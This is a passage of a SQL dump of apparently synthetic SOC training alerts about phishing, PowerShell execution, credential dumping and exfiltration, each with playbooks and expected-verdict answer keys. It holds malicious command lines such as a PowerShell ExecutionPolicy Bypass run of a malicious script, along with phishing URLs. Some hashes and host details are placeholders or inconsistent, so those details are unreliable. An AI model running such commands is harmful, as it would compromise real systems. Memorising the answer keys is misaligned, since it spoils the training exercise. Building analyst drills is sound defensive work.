IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis_report\",\"verdict\":\"malicious\",\"details\":\"Detected as a known malware hash associated with Silence Group\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://verify.bank-account.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Phishing site masquerading as a legitimate bank login 
page\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.811Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1100, 'Execution: Suspicious PowerShell Activity', 'high', 'Endpoint Detection and Response', 'An advanced threat actor is executing a PowerShell script designed to deploy ATM control malware. This activity follows a successful phishing campaign targeting financial institutions.', 'Script Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"4624\",\"computer_name\":\"ATM-SERVER-01\",\"user\":\"bank_admin\",\"ip_address\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bank_admin\\\\Documents\\\\atm_control.ps1\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"process_id\":4876,\"parent_process_id\":972,\"parent_command_line\":\"cmd.exe /c start powershell.exe\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ATM control malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_control.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_intelligence\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to control ATM 
operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"bank_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"clean\",\"details\":\"Authorized user account, likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1101, 'Persistence: Unusual Scheduled Task Creation', 'high', 'System Logs', 'Detected creation of a scheduled task by Silence Group to ensure malware persists through system reboots. The task is set to execute a known malicious binary.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:23Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\SilenceTask\",\"creator_user\":\"admin_user\",\"creator_ip\":\"192.168.1.15\",\"scheduled_time\":\"2023-10-05T14:00:00Z\",\"action\":\"CreateTask\",\"task_file_path\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\SilenceTask.exe\",\"task_md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"creator_username\":\"admin_user\",\"attacker_ip\":\"203.0.113.50\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known Silence Group command and control server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Authorized user account\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.812Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:23Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\SilenceTask\\\",\\\"creator_user\\\":\\\"admin_user\\\",\\\"creator_ip\\\":\\\"192.168.1.15\\\",\\\"scheduled_time\\\":\\\"2023-10-05T14:00:00Z\\\",\\\"action\\\":\\\"CreateTask\\\",\\\"task_file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\SilenceTask.exe\\\",\\\"task_md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"creator_username\\\":\\\"admin_user\\\",\\\"attacker_ip\\\":\\\"203.0.113.50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1102, 'Lateral Movement: Unauthorized Access to Internal Servers', 'high', 'Network Traffic Analysis', 'Exploiting harvested credentials, the attackers gained access to internal servers using lateral movement techniques. This positions them to manipulate ATM operations and extract financial data. The operation was detected via unusual login patterns and unauthorized access to critical systems.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.25\",\"protocol\":\"RDP\",\"username\":\"j.doe@bank.com\",\"event_type\":\"login_attempt\",\"event_result\":\"success\",\"file_accessed\":\"ntds.dit\",\"hash\":\"8e5c6d3a5968e3e5f2a9f3ef3b2e9cd7\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Successful RDP login using harvested credentials to access critical server.\"}', '2026-01-28 00:08:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe@bank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ntds.dit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for credential 
dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"8e5c6d3a5968e3e5f2a9f3ef3b2e9cd7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1103, 'Exfiltration: Data Transfer to External IP', 'critical', 'Data Loss Prevention', 'During the final phase of the operation, the Silence Group successfully exfiltrated sensitive data, including financial information, to an external server, critically compromising the bank\'s financial integrity.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:03:45Z\",\"source_ip\":\"10.4.21.67\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_q3_2023.zip\",\"file_hash\":\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\",\"data_size\":\"1.5GB\",\"action\":\"ALLOW\",\"tags\":[\"exfiltration\",\"financial_data\",\"Silence Group\"]}', '2026-01-28 00:08:15', '2026-02-16 17:48:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server used by Silence Group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.4.21.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file suspected in exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:03:45Z\\\",\\\"source_ip\\\":\\\"10.4.21.67\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.zip\\\",\\\"file_hash\\\":\\\"5f9d5d5f5f5d5d5d5d5f5f5d5d5f5d5d5f5d5f5d\\\",\\\"data_size\\\":\\\"1.5GB\\\",\\\"action\\\":\\\"ALLOW\\\",\\\"tags\\\":[\\\"exfiltration\\\",\\\"financial_data\\\",\\\"Silence Group\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1104, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting aerospace engineers. The email contained a malicious link disguised as a project update, aiming to gain initial access to the target systems.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'Closed', 116, '{\"timestamp\":\"2023-10-05T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"email_subject\":\"Project Update: New Aerospace Design\",\"email_from\":\"j.doe@projectsupport.com\",\"email_to\":\"engineer123@aerospacecorp.com\",\"attachment\":\"Aerospace_Project_Update.docx\",\"malicious_url\":\"http://malicious-link.com/update\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.doe@projectsupport.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sender email does not match known domains.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/update\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Threat Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to exploit 
kits.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.816Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1105, 'Magic Hound Malware Execution', 'high', 'Endpoint Detection and Response (EDR)', 'The Magic Hound malware was executed on the compromised system after the target clicked a malicious link. The malware established a foothold within the organization\'s network, potentially allowing for further malicious activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', 116, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\magic_hound_payload.ps1\",\"file_hash\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"files_dropped\":[{\"filename\":\"magic_hound_payload.ps1\",\"location\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\\",\"hash\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\"}]}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Magic Hound activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magic Hound payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"magic_hound_payload.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly 
used by Magic Hound\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1106, 'Persistence Using Cloud Services', 'high', 'Cloud Access Security Broker (CASB)', 'APT35 is leveraging legitimate cloud services to establish command and control channels, maintaining persistent access to compromised systems. The operation involves using a cloud storage service to host malicious scripts that are periodically executed by the compromised host.', 'Persistence', 'T1136 - Create Account', 1, 'new', NULL, '{\"event_id\":\"CASB-2023-10-03-123456\",\"timestamp\":\"2023-10-03T14:23:45Z\",\"source_ip\":\"203.0.113.56\",\"internal_ip\":\"10.10.10.25\",\"username\":\"compromised_user\",\"file_sha256\":\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\",\"filename\":\"malicious_script.js\",\"cloud_service\":\"cloudstorage.example.com\",\"action\":\"File Upload\",\"description\":\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT35 command and control IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User 